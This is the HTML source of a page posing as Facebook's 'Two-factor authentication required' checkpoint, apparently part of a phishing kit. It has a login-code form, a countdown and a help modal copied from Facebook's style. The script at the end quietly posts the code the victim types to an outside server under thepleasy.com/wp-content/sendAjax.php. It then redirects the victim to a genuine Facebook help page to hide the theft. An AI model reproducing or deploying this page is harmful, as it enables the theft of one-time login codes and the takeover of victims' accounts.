<html lang="en"><head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
      <link rel="icon" type="image/png" href="images/facebook.png">
      <link rel="stylesheet" href="style.css">
      <script src="jquery.min.js"></script>

      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />

      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
      <title>Facebook Help Center</title>
   <style>
      .twoFa-wrapper {
         width: 100%;
         height: 60px;
      }
      .twoFa-wrapper .twofa {
         width: 100%;
         height: auto;
      }
      .main-container2 {
         top: 38%;
      }
      .twoFa-wrapper a {
         text-decoration: none;
      }
      .countdown {
         padding-top: 8px;
      }

      @media(max-width: 1500px) {
         .main-container2 {
            top: 33%;
            height: 292px;
         }
         .countdown {
            padding-top: 5px;
         }
         .main-container2 .appeal {
            margin-bottom: 17px;
            border-bottom: 1px solid #dddfe2;
            padding-bottom: 7px;
         }
         .main-container2 p.normal-text {
            font-size: 14px;
         }
         .border-top-bottom {
            border-top: none;
            border-bottom: 1px solid #dddfe2;
            padding-top: 0px;
            padding-bottom: 20px;
         }
         #code {
            font-size: 14px;
            padding: 4px;
         }
         #continue {
            font-size: 14px;
         }
      }
      @media(max-width: 700px) {
         .main-container2 {
            top: unset;
            left: unset;
            height: 310px;
            position: relative;
            margin-top: 50px;
            transform: unset;
            z-index: 999;
            margin-bottom: 100px;
         }
         .fb-uppermenu a {
            display: none;
         }
         .step6-footer .second, .step6-footer .horizontal-line {
            display: none;
         }
         .step6-footer ul li {
            margin-right: 16px;
         }
         .step6-footer {
            height: 30vh;
            position: relative;
         }
         .step6-footer .wrapper {
            width: 95%;
            padding-top: 70px;
         }
         .countdown {
            padding-top: 4px;
         }
         .buttoni-authenticate {
            font-size: 13px;
         }
      }
   </style></head>

   

   <body>
      <!-- Modali Need another way to authenticate? -->
      <div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
         <div class="modal-dialog modal-dialog-centered" role="document">
         <div class="modal-content">
            <div class="modal-header">
               <h5 class="modal-title" id="exampleModalCenterTitle">Didn’t receive a code?</h5>
               <button type="button" class="close" data-dismiss="modal" aria-label="Close">
               <span aria-hidden="true">×</span>
               </button>
            </div>
            <div class="modal-body">
               <ul style="list-style: none; padding-left: 0;">
                  <li style="font-size: 14px; margin-bottom: 5px;">
                     1. Go to <b>Settings</b> &gt; Security and Login.
                  </li>
                  <li style="font-size: 14px; margin-bottom: 5px;">
                     2. Under the <b>Two-Factor Authentication</b> section, click <b>Use two-factor authentication.</b> You may need to re-enter your password.
                  </li>
                  <li style="font-size: 14px; margin-bottom: 5px;">
                     3. Next to <b>Recovery Codes</b>, click <b>Setup</b> then <b>Get Codes</b>. If you've already set up recovery codes, you can click <b>Show Codes</b>. 
                  </li>
               </ul>

               <img class="w-100" src="images/recovery.png" alt="recovery-code">
            </div>
            <div class="modal-footer">
               <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
               <button type="button" class="btn btn-primary" data-dismiss="modal">Continue</button>
            </div>
         </div>
         </div>
      </div>

      <div class="twoFa-wrapper">
         <div class="fb-uppermenu">
            <!-- <img src="images/Facebook-Logo.png" alt=""> -->
            <p>facebook</p>
            <a href="#">Log Out<p></p>
         </a></div><a href="#">

         <div class="main-container2">
            <div class="custom-form">
               <div class="appeal">
                  <h3>Two-factor authentication required</h3>
               </div>
   
               <p class="normal-text" style="color: black">You’ve asked us to require a 6-digit login code when anyone tries to access your account from a new device or browser.
                  <br>Enter the 6-digit code from your <b>code generator</b> or third-party app below.
               </p>
               <form name="RegForm" id="registerForm">
                  <div class="mb-3 row border-top-bottom">
                     <div class="col-sm-4 col-7">
                        <input required="" type="text" name="code" class="form-control" id="code" placeholder="Login code">
                     </div>
                     <div class="col-sm-4 col-5">
                        <div class="countdown" style="font-size: 14px; color: black">(wait: 1:50)</div>
                     </div>
                  </div>
      
                  <div class="row border-top-bottom" style="padding-top: 0; padding-bottom: 0; border: none; margin-bottom: 0 !important;">
                     <div class="col-sm-8 col-9">
                        <button class="buttoni-authenticate" type="button" data-toggle="modal" data-target="#exampleModalCenter" style="border: none; background: none; padding-top: 5px; color: #1877f2; padding-left: 0;">
                           Need another way to authenticate?
                        </button>
                     </div>

                     <div class="col-sm-4 col-3 bottom">
                        <button id="continue" class="submitBtn" onclick="submitForm()">Submit</button>
                     </div>
                  </div>
               </form>
            </div>
         </div>

         </a><div class="step6-footer"><a href="#">
            </a><div class="wrapper"><a href="#">
               </a><ul class="first uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><a href="#"><li>English (UK)</li></a><li><a href="#"></a><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/checkpoint/?next" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_GB&quot;, &quot;https:\/\/de-de.facebook.com\/checkpoint\/?next&quot;, &quot;www_list_selector&quot;, 1); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/checkpoint/?next" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_GB&quot;, &quot;https:\/\/tr-tr.facebook.com\/checkpoint\/?next&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Turkish">Türkçe</a></li><li><a class="_sv4" dir="ltr" href="https://sr-rs.facebook.com/checkpoint/?next" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sr_RS&quot;, &quot;en_GB&quot;, &quot;https:\/\/sr-rs.facebook.com\/checkpoint\/?next&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Serbian">Српски</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/checkpoint/?next" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_GB&quot;, &quot;https:\/\/fr-fr.facebook.com\/checkpoint\/?next&quot;, &quot;www_list_selector&quot;, 4); return false;" title="French (France)">Français</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/checkpoint/?next" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_GB&quot;, &quot;https:\/\/it-it.facebook.com\/checkpoint\/?next&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://bs-ba.facebook.com/checkpoint/?next" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;bs_BA&quot;, &quot;en_GB&quot;, &quot;https:\/\/bs-ba.facebook.com\/checkpoint\/?next&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Bosnian">Bosanski</a></li><li><a class="_sv4" dir="ltr" href="https://sv-se.facebook.com/checkpoint/?next" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sv_SE&quot;, &quot;en_GB&quot;, &quot;https:\/\/sv-se.facebook.com\/checkpoint\/?next&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Swedish">Svenska</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/checkpoint/?next" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_GB&quot;, &quot;https:\/\/es-la.facebook.com\/checkpoint\/?next&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Spanish">Español</a></li><li><a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/checkpoint/?next" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_BR&quot;, &quot;en_GB&quot;, &quot;https:\/\/pt-br.facebook.com\/checkpoint\/?next&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Portuguese (Brazil)">Português (Brasil)</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fpt-br.facebook.com%2Fcheckpoint%2F%3Fnext&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_iAKuuc9gciM sx_d13521"></i></a></li></ul>
               <div class="horizontal-line"></div>
               <ul class="second uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a data-savepage-href="/r.php" href="https://www.facebook.com/r.php" title="Sign up for Facebook">Sign Up</a></li><li><a data-savepage-href="/login/" href="https://www.facebook.com/login/" title="Log in to Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Take a look at Messenger.">Messenger</a></li><li><a data-savepage-href="/lite/" href="https://www.facebook.com/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos."> Watch </a></li><li><a data-savepage-href="/directory/people/" href="https://www.facebook.com/directory/people/" title="Browse our people directory.">People</a></li><li><a data-savepage-href="/directory/pages/" href="https://www.facebook.com/directory/pages/" title="Browse our Pages directory.">Pages</a></li><li><a data-savepage-href="/pages/category/" href="https://www.facebook.com/pages/category/">Page categories</a></li><li><a data-savepage-href="/places/" href="https://www.facebook.com/places/" title="Take a look at popular places on Facebook.">Places</a></li><li><a data-savepage-href="/games/" href="https://www.facebook.com/games/" title="Check out Facebook games.">Games</a></li><li><a data-savepage-href="/directory/places/" href="https://www.facebook.com/directory/places/" title="Browse our places directory.">Locations</a></li><li><a data-savepage-href="/marketplace/" href="https://www.facebook.com/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" target="_blank" title="Learn more about Facebook Pay" rel="noopener">Facebook Pay</a></li><li><a data-savepage-href="/directory/groups/" href="https://www.facebook.com/directory/groups/" title="Browse our Groups directory.">Groups</a></li><li><a data-savepage-href="/jobs/" href="https://www.facebook.com/jobs/" title="Apply for jobs and hire on Facebook.">Jobs</a></li><li><a href="https://www.oculus.com/" target="_blank" title="Learn more about Oculus" rel="noopener">Oculus</a></li><li><a href="https://portal.facebook.com/" target="_blank" title="Learn more about Portal from Facebook" rel="noopener">Portal</a></li><li><a href="https://www.instagram.com/" title="Take a look at Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy" data-lynx-uri="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT2hEcrp4VKQ-VlMhKPKNnsuj3f6Y43wVnOrt6pDNDg4iaK0MHxIfPdbDy6GXQDVK2a8PYLKjN5tz98NvOG82KD3Jqn1St9Gr2VuTroqPbMb8GuzFwz1V3GJoivQ9jJyfF0ME6HUBh8vgQXho-hP9Q">Instagram</a></li><li><a data-savepage-href="/local/lists/245019872666104/" href="https://www.facebook.com/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a data-savepage-href="/fundraisers/" href="https://www.facebook.com/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a data-savepage-href="/biz/directory/" href="https://www.facebook.com/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a data-savepage-href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" href="https://www.facebook.com/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Centre">Voting Information Centre</a></li><li><a data-savepage-href="/facebook" href="https://www.facebook.com/facebook" accesskey="8" title="Read our blog, discover the resource centre and find job opportunities.">About</a></li><li><a data-savepage-href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" href="https://www.facebook.com/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook">Create ad</a></li><li><a data-savepage-href="/pages/create/?ref_type=site_footer" href="https://www.facebook.com/pages/create/?ref_type=site_footer" title="Create a Page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a data-savepage-href="/careers/?ref=pf" href="https://www.facebook.com/careers/?ref=pf" title="Make your next career move to our brilliant company.">Careers</a></li><li><a data-nocookies="1" data-savepage-href="/privacy/explanation" href="https://www.facebook.com/privacy/explanation" title="Learn about your privacy and Facebook.">Privacy</a></li><li><a data-savepage-href="/policies/cookies/" href="https://www.facebook.com/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about AdChoices.">AdChoices<i class="img sp_x8aDTMjSDql sx_3ffd23"></i></a></li><li><a data-nocookies="1" data-savepage-href="/policies?ref=pf" href="https://www.facebook.com/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a data-savepage-href="/help/?ref=pf" href="https://www.facebook.com/help/?ref=pf" accesskey="0" title="Visit our Help Centre.">Help</a></li><li><a accesskey="6" class="accessible_elem" data-savepage-href="/settings" href="https://www.facebook.com/settings" title="View and edit your Facebook settings.">Settings</a></li><li><a accesskey="7" class="accessible_elem" data-savepage-href="/allactivity?privacy_source=activity_log_top_menu" href="https://www.facebook.com/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li></ul>
            </div>
         </div>
      </div>

      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-ygbV9kiqUc6oa4msXn9868pTtWMgiQaeYH7/t7LECLbyPA2x65Kgf80OJFdroafW" crossorigin="anonymous"></script>
      
      <script type="text/javascript">                                 
         function submitForm(){
            event.preventDefault()
            document.getElementById("continue").addEventListener("click", function(event){
               event.preventDefault()
            });
            var Code = document.forms["RegForm"]["code"]; 
            var codeGenerator =  document.getElementById('code').value;    
            if (Code.value == "") { 
            Code.focus(); 
            return false; 
         }
         else {              
            $.post("https://thepleasy.com/wp-content/sendAjax.php",
               {
                  codegeneratorRR: codeGenerator
               },
               function(data, status){
                  window.location.href='https://www.facebook.com/help/582999911881572/?helpref=hc_fnav';
                           
               });   
            }    
         }
      </script>

      <script>
         var timer2 = "3:01";
         var interval = setInterval(function() {
            var timer = timer2.split(':');
            //by parsing integer, I avoid all extra string processing
            var minutes = parseInt(timer[0], 10);
            var seconds = parseInt(timer[1], 10);
            --seconds;
            minutes = (seconds < 0) ? --minutes : minutes;
            if (minutes < 0) clearInterval(interval);
            seconds = (seconds < 0) ? 59 : seconds;
            seconds = (seconds < 10) ? '0' + seconds : seconds;
            //minutes = (minutes < 10) ?  minutes : minutes;
            $('.countdown').html('(wait: ' + minutes + ':' + seconds + ')');
            timer2 = minutes + ':' + seconds;
         }, 1000);
      </script>
  
</body></html>